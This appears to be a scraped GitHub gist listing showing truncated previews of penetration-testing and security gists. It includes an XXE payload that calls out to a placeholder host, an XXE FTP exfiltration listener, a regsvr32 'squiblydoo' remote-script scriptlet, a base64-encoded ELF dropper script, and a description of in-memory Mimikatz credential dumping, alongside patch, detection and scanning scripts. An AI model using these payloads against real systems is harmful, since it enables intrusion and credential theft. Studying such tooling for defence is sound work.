Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAYBAAAAAAAABAAAAAAAAAAIA3AAAAAAAAAAAAAEAAOAANAEAAHwAeAAYAAAAEAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAA2AIAAAAAAADYAgAAAAAAAAgAAAAAAAAAAwAAAAQAAAAYAwAAAAAAABgDAAAAAAAAGAMAAAAAAAAcAAAAAAAAABwAAAAAAAAAAQAAAAAAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgGAAAAAAAAOAYAAAAAAAAAEAAAAAAAAAEAAAAFAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAATQIAAAAAAABNAgAAAAAAAAAQAAAAAAAAAQAAAAQAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAABAAgAAAAAAAEACAAAAAAAAABAAAAAAAAABAAAABgAAAOgtAAAAAAAA6D0AAAAAAADoPQAAAAAAAFACAAAAAAAAWAIAAAAAAAAAEAAAAAAAAAIAAAAGAAAA+C0AAAAAAAD4PQAAAAAAAPg9AAAAAAAA4AEAAAAAAADgAQAAAAAAAAgAAAAAAAAABAAAAAQAAAA4AwAAAAAAADgDAAAAAAAAOAMAAAAAAAAgAAAAAAAAACAAAAAAAAAACAAAAAAAAAAEAAAABAAAAFgDAAAAAAAAWAMAAAAAAABYAwAAAAAAAEQAAAAAAAAARAAAAAAAAAAEAAAAAAAAAFPldGQEAAAAOAMAAAAAAAA4AwAAAAAAADgDAAAAAAAAIAAAAAAAAAAgAAAAAAAAAAgAAAAAAAAAUOV0ZAQAAAD4IAAAAAAAAPggAAAAAAAA+CAAAAAAAAA8AAAAAAAAADwAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAA6C0AAAAAAADoP |
christofersimbar
/ DeployPatch_KB4499175.ps1
Created
May 20, 2019 01:27
Powershell script for deploying KB4499175 patch
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get OS Version | |
| $osversion = (Get-WmiObject -class Win32_OperatingSystem).Caption | |
| # Get OS Architecture | |
| $osarch = (Get-WmiObject -class Win32_OperatingSystem).osarchitecture | |
| # Define Hot Fix Variables based on OS version | |
| Write-Host "Getting patch for..." $osversion " " $osarch | |
| Write-Host "Copying KB4499175 Patch to Temp folder" | |
| If (($osversion -like '*Windows 7*') -or ($osversion -like '*2008*')) { |
christofersimbar
/ Backdoor-Minimalist.sct
Created
October 11, 2018 16:25
— forked from enigma0x3/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
christofersimbar
/ xxeftp.py
Created
September 16, 2018 06:00
— forked from staaldraad/xxeftp.py
Python FTP server for XXE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env/python | |
| from __future__ import print_function | |
| import socket | |
| s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| s.bind(('0.0.0.0',2121)) | |
| s.listen(1) | |
| print('XXE-FTP listening ') | |
| conn,addr = s.accept() | |
| print('Connected by %s',addr) |
christofersimbar
/ read.js
Created
August 23, 2018 13:27
— forked from sjcotto/read.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function isChatMessage(message) { | |
| if (message.__x_isSentByMe) { | |
| return false; | |
| } | |
| if (message.__x_isNotification) { | |
| return false; | |
| } | |
| if (!message.__x_isUserCreatedType) { | |
| return false; | |
| } |
christofersimbar
/ cbapi-ps-lsass-loop.py
Created
August 23, 2018 13:16
— forked from curi0usJack/cbapi-ps-lsass-loop.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Carbon Black Evil PowerShell LSASS Query | |
| # | |
| # Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe | |
| # | |
| # Author: Jason Lang (@curi0usJack) | |
| # | |
| # Prereqs (Windows 10) | |
| # Install bash on Win10 | |
| # sudo apt-get install python-pip | |
| # sudo pip install --upgrade requests |
christofersimbar
/ XXE_payloads
Created
July 23, 2018 13:01
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
christofersimbar
/ Get-MS17010.ps1
Last active
June 28, 2018 06:36
— forked from iwikmai/Get-MS17010.ps1
Parse NMAP result of MS17-010 vulnerability scan to table so it can be exported to other formats
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Scans a host or network for the MS17-010 vulnerability and output results as a | |
| table that you can pipe to other PowerShell functions such as Invoke-Command or | |
| Export-CSV. | |
| .DESCRIPTION | |
| This script will use a custom NMap NSE script to scan a destination host on | |
| port 445 for the MS17-010 vulnerability. If the host is not online or is blocking |
christofersimbar
/ Invoke-Mimikidz
Created
March 30, 2018 05:12
— forked from tandasat/Invoke-Mimikidz
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Mimikidz | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
| dump credentials without ever writing the mimikatz binary to disk. | |
| The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
| This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
christofersimbar
/ web-servers.md
Created
March 9, 2018 05:03
— forked from willurd/web-servers.md
Big list of http static server one-liners
NewerOlder